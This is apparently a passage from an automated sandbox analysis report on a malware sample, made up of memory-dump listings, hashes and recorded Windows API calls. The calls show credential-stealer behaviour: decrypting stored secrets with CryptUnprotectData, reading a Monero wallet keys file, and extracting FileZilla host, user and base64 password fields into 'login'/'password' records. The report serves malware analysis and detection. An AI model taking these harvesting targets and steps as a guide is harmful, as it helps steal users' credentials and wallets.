                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: f2cd8cf9135928e127acb0a2a1e0a2bffe0319c048805744080278c4cefa9e69
                                • Instruction ID: 6df142c39ae1bf5fd97cedae1a7830ff1e119302c075277727e8e86e7826a7a0
                                • Opcode Fuzzy Hash: f2cd8cf9135928e127acb0a2a1e0a2bffe0319c048805744080278c4cefa9e69
                                • Instruction Fuzzy Hash: EA41F770A40A289FDB24DB58CC94F9BB7B4BB88702F4081D8E608A7290E7716EC5CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00939B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00939BA3
                                • LocalFree.KERNEL32(?), ref: 00939BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: ffe7a915d5bebb70528c30a576f952be32d4aba5977046bb2d038e2e78a2e85f
                                • Instruction ID: 3eb5b4595af52d95b152c596c588e24b5bab71743a603deae9d2a6d0626287e5
                                • Opcode Fuzzy Hash: ffe7a915d5bebb70528c30a576f952be32d4aba5977046bb2d038e2e78a2e85f
                                • Instruction Fuzzy Hash: 9511CCB8A00209DFDB44DF94D985AAEB7B9FF88300F104558E915A7390D774AE50CF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: B&u$q=#o
                                • API String ID: 0-4280379680
                                • Opcode ID: 3cd30f4f0e78b854eb6a9d6bfda0252c671afe61c9076c9e77831daa8b53e3b9
                                • Instruction ID: 80118766619a6e6f8d1b5e0657b07e163c4fe4c2195ea7ef7936c6150900e0f8
                                • Opcode Fuzzy Hash: 3cd30f4f0e78b854eb6a9d6bfda0252c671afe61c9076c9e77831daa8b53e3b9
                                • Instruction Fuzzy Hash: E9B228F3A082149FE304AE2DDC8567AFBE9EF94720F1A893DEAC4C7744E53558058792
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ]~$j%o?
                                • API String ID: 0-1545899973
                                • Opcode ID: 015beb45700c685f47ef5a101330abb5cca7391c353b794f6c47cad02367d070
                                • Instruction ID: daea267cd6cc7578f0245989e5442b3965622ff761940e39681dd610c619752a
                                • Opcode Fuzzy Hash: 015beb45700c685f47ef5a101330abb5cca7391c353b794f6c47cad02367d070
                                • Instruction Fuzzy Hash: 22623BF3A0C2009FE304AE2DEC9577AB7E5EF94620F1A853DEAC5C7744E63498058692
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: z^s$z^{
                                • API String ID: 0-297233388
                                • Opcode ID: 03cf9c6d5f28c175d55f51e6c6eb40f8578b72b148d754597a47dca6813b3859
                                • Instruction ID: ca73c2686da5bc912f5af8cf79bf3fe0f828be295c39392e657624da9a7f5e3a
                                • Opcode Fuzzy Hash: 03cf9c6d5f28c175d55f51e6c6eb40f8578b72b148d754597a47dca6813b3859
                                • Instruction Fuzzy Hash: EF414BB3A093044BE314AE2DECC577AB7D6EFD4710F2A863CDA8447784ED796909C246
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0Oy
                                • API String ID: 0-1359773364
                                • Opcode ID: fd24faf3a2c60b2eabdadd42076bdd8995e321bf10e3126034aecd5b7ca4dd32
                                • Instruction ID: 7f3da466fcd2b920b0110f55db2c919321fdd3c4b26c236d40cb12d0df162b29
                                • Opcode Fuzzy Hash: fd24faf3a2c60b2eabdadd42076bdd8995e321bf10e3126034aecd5b7ca4dd32
                                • Instruction Fuzzy Hash: 0B12E6F360C6009FD308AF29EC8577ABBD9EF94320F16893DE6C5C7744EA3558418696
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f66fe1218b399a4067fcbca75d65f3b1308c70e1e359139b2796a4bc4c8260e3
                                • Instruction ID: c1839d3cb1c5bf4d28d98bea022f88e45264f06366affd2f5afb8a47871cff34
                                • Opcode Fuzzy Hash: f66fe1218b399a4067fcbca75d65f3b1308c70e1e359139b2796a4bc4c8260e3
                                • Instruction Fuzzy Hash: 54F1E1F360C600AFE304AE2DEC8577ABBE5EF94760F16852DE6C483744EA3598058787
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 656a5c2cc6855b4f39f8a8000fc898dc3c1b7dab9a4e54e8b0a6bd6b7f710acc
                                • Instruction ID: 21a65d2f3cbcf66960f37cf1c9ce1ba463734c7803edca2724d2b99aef15a783
                                • Opcode Fuzzy Hash: 656a5c2cc6855b4f39f8a8000fc898dc3c1b7dab9a4e54e8b0a6bd6b7f710acc
                                • Instruction Fuzzy Hash: E16129F3A0C3049FE3046E29ECC576AB7D5EB44310F1A453DDAC893780EA7698418797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e2cb16470e0bd647aa71c39aa19b7ac59989f941b73f004d0d0c71eec1e1522d
                                • Instruction ID: f4fdb03c54ea899eee353e2a66a08f63032b4729a12f2bf9d40bfeda6a15b0c5
                                • Opcode Fuzzy Hash: e2cb16470e0bd647aa71c39aa19b7ac59989f941b73f004d0d0c71eec1e1522d
                                • Instruction Fuzzy Hash: 904105F3508604AFE704AF2AEC8563AF7E6FBD4320F16493DEAC987340E67568558613
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3918f7dba2f272c2c6f81b16cc70c0ebf26159eb975116307d6a1790c3ce5967
                                • Instruction ID: a918a280de62e26030ce0f4afab13b3fb06990a38e89001c7983ca5303bc5f5d
                                • Opcode Fuzzy Hash: 3918f7dba2f272c2c6f81b16cc70c0ebf26159eb975116307d6a1790c3ce5967
                                • Instruction Fuzzy Hash: 8941E9F3A182148BF3046E28DC5537AB7D5EB94320F1B463CDAD48B7C4D93E58468786
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                  • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                  • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                  • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                  • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                  • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                  • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00950DBA,00950DB7,00950DB6,00950DB3), ref: 00940362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00940369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00940385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 009403CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 009403DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00940419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00940463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00940562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00940571
                                • lstrcat.KERNEL32(?,url: ), ref: 00940580
                                • lstrcat.KERNEL32(?,00000000), ref: 00940593
                                • lstrcat.KERNEL32(?,00951678), ref: 009405A2
                                • lstrcat.KERNEL32(?,00000000), ref: 009405B5
                                • lstrcat.KERNEL32(?,0095167C), ref: 009405C4
                                • lstrcat.KERNEL32(?,login: ), ref: 009405D3
                                • lstrcat.KERNEL32(?,00000000), ref: 009405E6
                                • lstrcat.KERNEL32(?,00951688), ref: 009405F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00940604
                                • lstrcat.KERNEL32(?,00000000), ref: 00940617
                                • lstrcat.KERNEL32(?,00951698), ref: 00940626
                                • lstrcat.KERNEL32(?,0095169C), ref: 00940635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
